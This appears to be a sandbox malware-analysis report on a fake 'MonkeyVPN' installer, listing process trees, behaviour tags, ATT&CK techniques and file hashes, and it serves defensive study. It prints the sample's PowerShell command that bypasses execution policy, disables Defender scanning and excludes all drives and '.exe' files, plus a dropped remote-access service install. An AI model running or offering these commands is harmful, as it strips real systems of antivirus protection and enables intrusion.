to memory of 384 4712 msiexec.exe MsiExec.exe PID 4712 wrote to memory of 384 4712 msiexec.exe MsiExec.exe PID 4712 wrote to memory of 384 4712 msiexec.exe MsiExec.exe PID 2912 wrote to memory of 2100 2912 powershell.exe msedge.exe PID 2912 wrote to memory of 2100 2912 powershell.exe msedge.exe PID 2912 wrote to memory of 2100 2912 powershell.exe msedge.exe PID 2912 wrote to memory of 2100 2912 powershell.exe msedge.exe PID 2100 wrote to memory of 4380 2100 msedge.exe chrome.exe PID 2100 wrote to memory of 4380 2100 msedge.exe chrome.exe PID 2100 wrote to memory of 4380 2100 msedge.exe chrome.exe PID 2100 wrote to memory of 4380 2100 msedge.exe chrome.exe PID 4380 wrote to memory of 3512 4380 chrome.exe powershell.exe PID 4380 wrote to memory of 3512 4380 chrome.exe powershell.exe PID 4380 wrote to memory of 1996 4380 chrome.exe naver.exe PID 4380 wrote to memory of 1996 4380 chrome.exe naver.exe PID 2292 wrote to memory of 3812 2292 naver.exe wmic.exe PID 2292 wrote to memory of 3812 2292 naver.exe wmic.exe PID 2292 wrote to memory of 3668 2292 naver.exe wmic.exe PID 2292 wrote to memory of 3668 2292 naver.exe wmic.exe PID 2292 wrote to memory of 60 2292 naver.exe wmic.exe PID 2292 wrote to memory of 60 2292 naver.exe wmic.exe PID 2292 wrote to memory of 1852 2292 naver.exe wmic.exe PID 2292 wrote to memory of 1852 2292 naver.exe wmic.exe PID 2292 wrote to memory of 4412 2292 naver.exe wmic.exe PID 2292 wrote to memory of 4412 2292 naver.exe wmic.exe PID 2292 wrote to memory of 2240 2292 naver.exe wmic.exe PID 2292 wrote to memory of 2240 2292 naver.exe wmic.exe PID 1700 wrote to memory of 4332 1700 naver.exe wmic.exe PID 1700 wrote to memory of 4332 1700 naver.exe wmic.exe PID 1700 wrote to memory of 808 1700 naver.exe wmic.exe PID 1700 wrote to memory of 808 1700 naver.exe wmic.exe PID 1700 wrote to memory of 1272 1700 naver.exe wmic.exe PID 1700 wrote to memory of 1272 1700 naver.exe wmic.exe PID 1700 wrote to memory of 3440 1700 naver.exe wmic.exe PID 1700 wrote to memory of 3440 1700 naver.exe wmic.exe PID 1700 wrote to memory of 208 1700 naver.exe wmic.exe PID 1700 wrote to memory of 208 1700 naver.exe wmic.exe PID 1700 wrote to memory of 3756 1700 naver.exe powershell.exe PID 1700 wrote to memory of 3756 1700 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:3512 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\start.exestart.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI92F9.tmp4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3340
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 861EEC0975AD77256AB6AFD564D17DFA C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:384
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:3812
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:3668
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:60
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:1852
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4412
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:2240
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:4332
-
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:808
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1272
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:3440
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3756
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD511a4be5f9e5fdf4a714849b63ea2f086
SHA197ec6e61a365b04d572e100699c37ebbbda9c5d2
SHA2567854010dfa1f008ac8f26493dfbbc378bafb67e4e3dc9d1a13ce408668f2fac4
SHA512807ea1222e227985901057c3337d80b587174b3e8b9e50d4d8b4bd67ce500e3e891057f318b74c401196612dcb969862bb6edda2f938f573a54ac53ff88efea8
-
Filesize
30.3MB
MD571141c5e6c5aa8e363f64c6014588d9b
SHA1fd759473d536ce9423d3e9efb6f0b118f149e0d4
SHA25626188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e
SHA512187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41
-
Filesize
298KB
MD5684f2d21637cb5835172edad55b6a8d9
SHA15eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA5127b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
30.4MB
MD55b073f98aab6e4f779aadd9f9d4b75a2
SHA1c81700159450dc0ac7c40f7e73203a963fd83e9a
SHA2560b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca
SHA51284c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d
-
Filesize
131KB
MD51abe9befaa0a622b030d0821d279427f
SHA1c62a53bc4f540873c503ddd74eae868677494777
SHA256dc83d02eb8f7f6e81777a109a9f9765b468369c482d336be07a866f6e3d8c4d4
SHA512d4c8379fe3617395a3ffaf8ceb53a56d4e30e2ebeed0aa0c0022f89bead065c705c30f22ed0f83acea9f84dbe226e99471a34fef0e91a30de7a4b0439447dfc8
-
Filesize
5.3MB
MD5ebf9e3ebfc0b3f99e971a1be4f0072c6
SHA1ffd1d6dccf254d70605b1624980d8f01d8783d6f
SHA256d819ee6d4691be3c4729edccc32cd763f506860892459c275045282127552414
SHA512c1d31f2d70ae4d5733914d94a0ad438f47ffa3364bd06a57291f0a9772e70d30a7b09094dc50c1391f4890249c11d6256dcb38d83115632cf53eb334e8702407
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb
-
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F1F1B0B6369A84B2B68552FDC57ABDEB60805A02
Filesize1KB
MD5fea22cdc65b314eaf6445fbf97e961f9
SHA1bfd8ec802a7e36b4fe98666313f0324417523ced
SHA2563d9ee364e8a4bdc4ceff4b2e10a570c478f5b7b75fc39508bdad905086a00850
SHA512f6eefb64873c90fc6e81603aa60ebf00a468c8fa52c18fb750236afc9ec889008e4194549f976dce555fb0c73e7fd15cd65654cde703998b34db6144697065ed